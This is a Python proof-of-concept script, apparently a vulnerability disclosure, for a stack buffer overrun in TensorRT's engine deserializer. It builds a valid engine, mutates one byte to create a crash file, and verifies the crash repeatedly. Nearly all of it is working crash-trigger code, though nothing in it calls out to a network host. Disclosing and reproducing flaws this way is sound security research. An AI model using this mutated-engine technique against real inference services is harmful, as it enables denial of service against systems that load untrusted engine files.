File size: 6,990 Bytes
f145112
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
"""
VULN-009: Stack Buffer Overrun in TensorRT Engine Deserializer
================================================================
A single-byte mutation in the NGNE (engine graph) section of a valid
TensorRT engine file triggers STATUS_STACK_BUFFER_OVERRUN (0xC0000409)
during deserializeCudaEngine().

This indicates stack-based buffer overflow detected by Windows /GS stack
cookie protection. The crash occurs in the closed-source libnvinfer.dll
engine parser.

CWE: CWE-121 (Stack-based Buffer Overflow)
Distinct from VULN-006 (CWE-125, Out-of-bounds Read / ACCESS_VIOLATION)
Distinct from VULN-008 (CWE-369, Integer Divide-by-Zero)

To reproduce:
1. python vuln009_standalone_poc.py build   (builds valid + crash engines)
2. python vuln009_standalone_poc.py crash   (loads crash engine, triggers crash)
3. python vuln009_standalone_poc.py verify  (full verification)
"""
import os, sys, struct, subprocess, time
import numpy as np

POC_DIR = os.path.dirname(os.path.abspath(__file__))
VALID_PATH = os.path.join(POC_DIR, "vuln009_valid.engine")
CRASH_PATH = os.path.join(POC_DIR, "vuln009_crash.engine")

# Crash offset and value (from full scan)
CRASH_OFFSET = 498
CRASH_VALUE = 0xFF
ORIGINAL_VALUE = 0x00


def cmd_build():
    """Build valid engine, then create crash variant."""
    import tensorrt as trt
    from onnx import helper, TensorProto, numpy_helper

    print("[*] Building valid BatchNorm TensorRT engine...")
    bn_s = numpy_helper.from_array(np.ones(8, dtype=np.float32), name="bn_s")
    bn_b = numpy_helper.from_array(np.zeros(8, dtype=np.float32), name="bn_b")
    bn_m = numpy_helper.from_array(np.zeros(8, dtype=np.float32), name="bn_m")
    bn_v = numpy_helper.from_array(np.ones(8, dtype=np.float32), name="bn_v")
    g = helper.make_graph(
        [helper.make_node("BatchNormalization", ["x", "bn_s", "bn_b", "bn_m", "bn_v"], ["output"])],
        "batchnorm",
        [helper.make_tensor_value_info("x", TensorProto.FLOAT, [1, 8, 4, 4])],
        [helper.make_tensor_value_info("output", TensorProto.FLOAT, None)],
        [bn_s, bn_b, bn_m, bn_v])
    model = helper.make_model(g, opset_imports=[helper.make_opsetid("", 17)])
    model.ir_version = 8

    logger = trt.Logger(trt.Logger.WARNING)
    builder = trt.Builder(logger)
    network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
    parser = trt.OnnxParser(network, logger)
    assert parser.parse(model.SerializeToString()), "Parse failed"
    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 256 << 20)
    engine_bytes = builder.build_serialized_network(network, config)
    assert engine_bytes, "Build failed"
    engine_data = bytes(engine_bytes)

    # Save valid engine
    with open(VALID_PATH, "wb") as f:
        f.write(engine_data)
    print(f"[+] Valid engine: {VALID_PATH} ({len(engine_data)} bytes)")

    # Verify it loads
    runtime = trt.Runtime(logger)
    engine = runtime.deserialize_cuda_engine(engine_data)
    assert engine, "Valid engine failed to load"
    print(f"[+] Valid engine loads OK")

    # Create crash variant
    mutated = bytearray(engine_data)
    print(f"[*] Mutating byte at offset {CRASH_OFFSET}: 0x{engine_data[CRASH_OFFSET]:02x} -> 0x{CRASH_VALUE:02x}")
    mutated[CRASH_OFFSET] = CRASH_VALUE

    with open(CRASH_PATH, "wb") as f:
        f.write(bytes(mutated))
    print(f"[+] Crash engine: {CRASH_PATH} ({len(mutated)} bytes)")
    print(f"[+] Build complete. Run 'python {os.path.basename(__file__)} crash' to trigger.")


def cmd_crash():
    """Load the crash engine (will trigger STATUS_STACK_BUFFER_OVERRUN)."""
    import tensorrt as trt

    if not os.path.exists(CRASH_PATH):
        print("[-] Crash engine not found. Run 'build' first.")
        sys.exit(1)

    print(f"[*] Loading crash engine: {CRASH_PATH}")
    print(f"[*] Expecting STATUS_STACK_BUFFER_OVERRUN (0xC0000409)...")

    logger = trt.Logger(trt.Logger.ERROR)
    runtime = trt.Runtime(logger)
    with open(CRASH_PATH, "rb") as f:
        data = f.read()

    # This call will crash with STATUS_STACK_BUFFER_OVERRUN
    engine = runtime.deserialize_cuda_engine(data)
    if engine:
        print("[!] Engine loaded (unexpected - crash should have occurred)")
    else:
        print("[*] Engine rejected (no crash, but deserialization failed)")


def cmd_verify():
    """Full verification: test in subprocess, confirm crash type."""
    if not os.path.exists(VALID_PATH) or not os.path.exists(CRASH_PATH):
        print("[-] Engine files not found. Run 'build' first.")
        sys.exit(1)

    print("[1] Testing valid engine...")
    rc1 = _test_engine_subprocess(VALID_PATH)
    print(f"    Return code: {rc1}")
    assert rc1 == 0, "Valid engine should load OK"

    print("[2] Testing crash engine...")
    rc2 = _test_engine_subprocess(CRASH_PATH)
    print(f"    Return code: {rc2}")

    if rc2 == 3221226505:
        print("[+] CONFIRMED: STATUS_STACK_BUFFER_OVERRUN (0xC0000409)")
        print("[+] CWE-121: Stack-based Buffer Overflow")
        print("[+] This is a DISTINCT vulnerability from VULN-006 (ACCESS_VIOLATION)")
    elif rc2 == 3221225477:
        print("[!] ACCESS_VIOLATION (0xC0000005) - different crash type")
    else:
        print(f"[?] Unexpected return code: {rc2}")

    # Show diff
    valid = open(VALID_PATH, "rb").read()
    crash = open(CRASH_PATH, "rb").read()
    diffs = [(i, valid[i], crash[i]) for i in range(min(len(valid), len(crash))) if valid[i] != crash[i]]
    print(f"\n[3] Difference between valid and crash engines:")
    for off, v, c in diffs:
        print(f"    Offset {off}: 0x{v:02x} -> 0x{c:02x}")

    # Reproducibility test
    print(f"\n[4] Reproducibility test (10 runs)...")
    results = []
    for i in range(10):
        rc = _test_engine_subprocess(CRASH_PATH)
        results.append(rc)
    crash_count = sum(1 for r in results if r == 3221226505)
    print(f"    Stack overrun: {crash_count}/10 runs")
    print(f"    Return codes: {results}")


def _test_engine_subprocess(engine_path):
    """Test engine loading in subprocess. Returns exit code."""
    code = f"""
import tensorrt as trt
logger = trt.Logger(trt.Logger.ERROR)
runtime = trt.Runtime(logger)
with open(r"{engine_path}", "rb") as f:
    engine = runtime.deserialize_cuda_engine(f.read())
print("OK" if engine else "FAIL")
"""
    try:
        r = subprocess.run([sys.executable, "-c", code],
                          capture_output=True, text=True, timeout=15)
        return r.returncode
    except subprocess.TimeoutExpired:
        return -999


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {os.path.basename(__file__)} [build|crash|verify]")
        sys.exit(1)

    cmd = sys.argv[1]
    if cmd == "build":
        cmd_build()
    elif cmd == "crash":
        cmd_crash()
    elif cmd == "verify":
        cmd_verify()
    else:
        print(f"Unknown command: {cmd}")
        sys.exit(1)